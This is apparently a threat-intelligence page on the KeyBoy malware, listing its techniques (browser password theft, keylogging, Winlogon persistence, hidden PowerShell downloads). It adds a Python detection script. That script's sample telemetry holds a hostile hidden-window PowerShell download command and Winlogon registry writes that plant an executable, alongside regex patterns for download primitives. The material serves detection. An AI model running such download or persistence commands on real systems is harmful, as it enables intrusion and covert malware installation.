KeyBoy

KeyBoy is malware that has been used in targeted campaigns against members of the Tibetan Parliament in 2016.[1][2]

ID: S0387
Type: MALWARE
Platforms: Windows
Version: 1.3
Created: 14 June 2019
Last Modified: 18 April 2024

Techniques Used

Domain ID Name Use
Enterprise T1555 .003 Credentials from Password Stores: Credentials from Web Browsers

KeyBoy attempts to collect passwords from browsers.[3]

Enterprise T1543 .003 Create or Modify System Process: Windows Service

KeyBoy installs a service pointing to a malicious DLL dropped to disk.[3]

Enterprise T1547 .004 Boot or Logon Autostart Execution: Winlogon Helper DLL

KeyBoy issues the command reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" to achieve persistence.[2][1]

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

KeyBoy uses PowerShell commands to download and execute payloads.[2]

.003 Command and Scripting Interpreter: Windows Command Shell

KeyBoy can launch interactive shells for communicating with the victim machine.[2][3]

.005 Command and Scripting Interpreter: Visual Basic

KeyBoy uses VBS scripts for installing files and performing execution.[1]

.006 Command and Scripting Interpreter: Python

KeyBoy uses Python scripts for installing files and performing execution.[1]

Enterprise T1113 Screen Capture

KeyBoy has a command to perform screen grabbing.[2]

Enterprise T1001 .003 Data Obfuscation: Protocol or Service Impersonation

KeyBoy uses custom SSL libraries to impersonate SSL in C2 traffic.[2]

Enterprise T1083 File and Directory Discovery

KeyBoy has a command to launch a file browser or explorer on the system.[2]

Enterprise T1027 .013 Obfuscated Files or Information: Encrypted/Encoded File

In one version of KeyBoy, string obfuscation routines were used to hide many of the critical values referenced in the malware.[1]

Enterprise T1070 .006 Indicator Removal: Timestomp

KeyBoy time-stomped its DLL in order to evade detection.[2]

Enterprise T1082 System Information Discovery

KeyBoy can gather extended system information, such as information about the operating system, disks, and memory.[2][3]

Enterprise T1016 System Network Configuration Discovery

KeyBoy can determine the public or WAN IP address for the system.[2]

Enterprise T1105 Ingress Tool Transfer

KeyBoy has download and upload functionality.[2][3]

Enterprise T1056 .001 Input Capture: Keylogging

KeyBoy installs a keylogger for intercepting credentials and keystrokes.[3]

Enterprise T1559 .002 Inter-Process Communication: Dynamic Data Exchange

KeyBoy uses the Dynamic Data Exchange (DDE) protocol to download remote payloads.[2]

Enterprise T1564 .003 Hide Artifacts: Hidden Window

KeyBoy uses -w Hidden to conceal the PowerShell window that downloads a payload.[2]
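The two behaviours above that leave the clearest telemetry are the Winlogon registry write (T1547.004) and the hidden-window PowerShell download (T1564.003 with T1059.001). The following Python is an added example, not code from the KeyBoy reports or from MITRE: it compares Winlogon value writes against a baseline and flags process command lines that combine a hidden PowerShell window with a network download primitive. The Winlogon baseline values, the event record shape and every sample command line and registry event are constructed assumptions; the detection key and the -w Hidden pattern come from the page.

```python
"""Defender-side checks for two KeyBoy behaviours listed on this page.

Added example, not code from the KeyBoy reports or from MITRE. All sample
registry events and command lines below are constructed for the demo.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Key named in the page's T1547.004 entry.
WINLOGON_KEY = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Baseline for the Winlogon values that persistence implants most often
# rewrite. Assumption: a default Windows install; replace these with values
# captured from your own golden image.
EXPECTED_WINLOGON: Dict[str, str] = {
    "Shell": "explorer.exe",
    "Userinit": r"C:\Windows\system32\userinit.exe,",
}


@dataclass
class RegistryEvent:
    """One registry value-set event (constructed shape, e.g. Sysmon Event ID 13)."""
    key: str
    value_name: str
    data: str
    process: str


def check_winlogon_event(event: RegistryEvent) -> List[str]:
    """Return findings for a value write under the Winlogon key, empty if benign."""
    if event.key.lower() != WINLOGON_KEY.lower():
        return []
    expected = EXPECTED_WINLOGON.get(event.value_name)
    if expected is None:
        # A value absent from the baseline (custom DLL loaders, odd helper
        # entries) is worth a look rather than being silently ignored.
        return [f"unexpected Winlogon value {event.value_name!r} = {event.data!r} "
                f"written by {event.process}"]
    if event.data.strip().lower() != expected.lower():
        return [f"Winlogon {event.value_name} changed from {expected!r} to "
                f"{event.data!r} by {event.process}"]
    return []


# -w / -win / -WindowStyle followed by Hidden (PowerShell accepts parameter prefixes).
_HIDDEN_RE = re.compile(r"(?i)(?:^|\s)-w\w*\s+hidden\b")
_PS_RE = re.compile(r"(?i)\b(?:powershell|pwsh)(?:\.exe)?\b")
# Common in-script download primitives; extend this from your own telemetry.
_DOWNLOAD_RE = re.compile(
    r"(?i)downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|"
    r"invoke-restmethod|\birm\b|net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b")


def classify_powershell(cmdline: str) -> Dict[str, bool]:
    """Break a process command line into the three indicators the rule combines."""
    return {
        "powershell": bool(_PS_RE.search(cmdline)),
        "hidden_window": bool(_HIDDEN_RE.search(cmdline)),
        "download": bool(_DOWNLOAD_RE.search(cmdline)),
    }


def flag_hidden_download(cmdline: str) -> bool:
    """True only when PowerShell runs hidden AND pulls something from the network.

    Either indicator alone is routine in admin scripts; the pair is what the
    page's description of KeyBoy's loader looks like in process telemetry."""
    c = classify_powershell(cmdline)
    return c["powershell"] and c["hidden_window"] and c["download"]


def scan_command_lines(lines: List[str]) -> List[str]:
    """Return only the command lines that trip the combined rule."""
    return [ln for ln in lines if flag_hidden_download(ln)]


# Constructed sample telemetry (not taken from any KeyBoy sample).
SAMPLE_COMMAND_LINES = [
    'powershell.exe -w hidden -nop -c "(New-Object Net.WebClient).DownloadFile('
    "'http://198.51.100.7/stage.dat','C:\\Users\\Public\\stage.dat')\"",
    r"powershell.exe -WindowStyle Hidden -File C:\Scripts\nightly-backup.ps1",
    'powershell.exe -c "Invoke-WebRequest https://intranet.example/health"',
    r"C:\Windows\System32\notepad.exe C:\Users\alice\notes.txt",
]

SAMPLE_REGISTRY_EVENTS = [
    RegistryEvent(WINLOGON_KEY, "Shell", r"explorer.exe,C:\Users\Public\svc.exe", "reg.exe"),
    RegistryEvent(WINLOGON_KEY, "Shell", "explorer.exe", "msiexec.exe"),
    RegistryEvent(WINLOGON_KEY, "UpdateHelper", r"C:\Windows\Temp\helper.dll", "cmd.exe"),
]

if __name__ == "__main__":
    for ev in SAMPLE_REGISTRY_EVENTS:
        for finding in check_winlogon_event(ev):
            print("[registry]", finding)
    for line in scan_command_lines(SAMPLE_COMMAND_LINES):
        print("[process]", line)
```

Run stand-alone, the script reports the Shell value that gained an extra executable, the unknown UpdateHelper value, and the one command line that both hides its window and downloads a file; the hidden backup script and the visible health check are left alone. Feed it real Sysmon or 4688/4657 records by mapping their fields onto RegistryEvent and plain command-line strings.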

Groups That Use This Software

ID Name References
G0081 Tropic Trooper [4][5]

References